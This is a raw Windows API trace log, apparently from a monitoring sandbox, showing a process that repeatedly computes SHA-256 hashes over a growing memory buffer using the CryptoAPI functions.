	[0239.794] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0239.794] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1f98
	[0239.794] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1f98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1f98, pdwDataLen=0x128ba4) returned 1
	[0239.794] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.794] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.794] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.795] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.795] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0239.795] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1fc0
	[0239.795] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1fc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1fc0, pdwDataLen=0x128ba4) returned 1
	[0239.795] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.795] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.795] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.795] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.795] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0239.795] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1fe8
	[0239.795] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1fe8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1fe8, pdwDataLen=0x128ba4) returned 1
	[0239.795] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.795] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.795] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.796] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.796] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0239.796] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2010
	[0239.796] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2010, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2010, pdwDataLen=0x128ba4) returned 1
	[0239.796] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.796] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.796] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.796] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.796] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0239.796] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2038
	[0239.796] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2038, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2038, pdwDataLen=0x128ba4) returned 1
	[0239.797] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.797] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.797] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.797] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.797] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0239.797] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.797] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2060
	[0239.797] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2060, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2060, pdwDataLen=0x128ba4) returned 1
	[0239.797] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.797] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.797] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.798] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.798] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0239.798] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2088
	[0239.798] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2088, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2088, pdwDataLen=0x128ba4) returned 1
	[0239.798] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.798] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.798] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.798] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.798] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0239.798] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c20b0
	[0239.798] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c20b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c20b0, pdwDataLen=0x128ba4) returned 1
	[0239.798] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.798] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.798] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.799] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.799] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0239.799] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c20d8
	[0239.799] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c20d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c20d8, pdwDataLen=0x128ba4) returned 1
	[0239.799] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.799] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.799] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.799] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.799] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0239.799] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2100
	[0239.800] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2100, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2100, pdwDataLen=0x128ba4) returned 1
	[0239.800] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.800] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.800] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.800] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.800] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0239.800] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2128
	[0239.800] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2128, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2128, pdwDataLen=0x128ba4) returned 1
	[0239.800] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.800] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.800] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.801] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.801] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0239.801] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2150
	[0239.801] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2150, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2150, pdwDataLen=0x128ba4) returned 1
	[0239.801] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.801] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.801] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.801] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.801] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0239.801] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2178
	[0239.801] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2178, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2178, pdwDataLen=0x128ba4) returned 1
	[0239.801] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.801] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.801] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.802] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.802] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0239.802] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c21a0
	[0239.802] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c21a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c21a0, pdwDataLen=0x128ba4) returned 1
	[0239.802] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.802] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.802] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.802] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.803] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0239.803] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c21c8
	[0239.803] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c21c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c21c8, pdwDataLen=0x128ba4) returned 1
	[0239.803] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.803] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.803] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.803] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.803] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0239.803] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c21f0
	[0239.803] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c21f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c21f0, pdwDataLen=0x128ba4) returned 1
	[0239.803] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.803] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.803] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.804] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.804] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0239.804] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2218
	[0239.804] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2218, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2218, pdwDataLen=0x128ba4) returned 1
	[0239.804] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.804] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.804] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.805] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.805] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0239.805] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2240
	[0239.805] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2240, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2240, pdwDataLen=0x128ba4) returned 1
	[0239.805] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.805] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.805] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.806] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.806] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0239.806] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2268
	[0239.806] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2268, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2268, pdwDataLen=0x128ba4) returned 1
	[0239.806] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.806] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.806] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.806] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.806] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0239.806] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2290
	[0239.806] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2290, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2290, pdwDataLen=0x128ba4) returned 1
	[0239.806] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.806] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.806] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.807] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.807] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0239.807] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c22b8
	[0239.807] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c22b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c22b8, pdwDataLen=0x128ba4) returned 1
	[0239.807] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.807] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.807] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.807] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.807] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0239.807] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c22e0
	[0239.807] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c22e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c22e0, pdwDataLen=0x128ba4) returned 1
	[0239.808] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.808] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.808] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.808] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.808] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0239.808] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2308
	[0239.808] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2308, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2308, pdwDataLen=0x128ba4) returned 1
	[0239.808] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.808] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.808] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.809] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.809] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0239.809] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2330
	[0239.809] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2330, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2330, pdwDataLen=0x128ba4) returned 1
	[0239.809] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.809] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.809] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.809] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.809] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0239.809] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2358
	[0239.809] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2358, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2358, pdwDataLen=0x128ba4) returned 1
	[0239.809] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.809] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.809] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.810] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.810] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xd60, dwFlags=0x0) returned 1
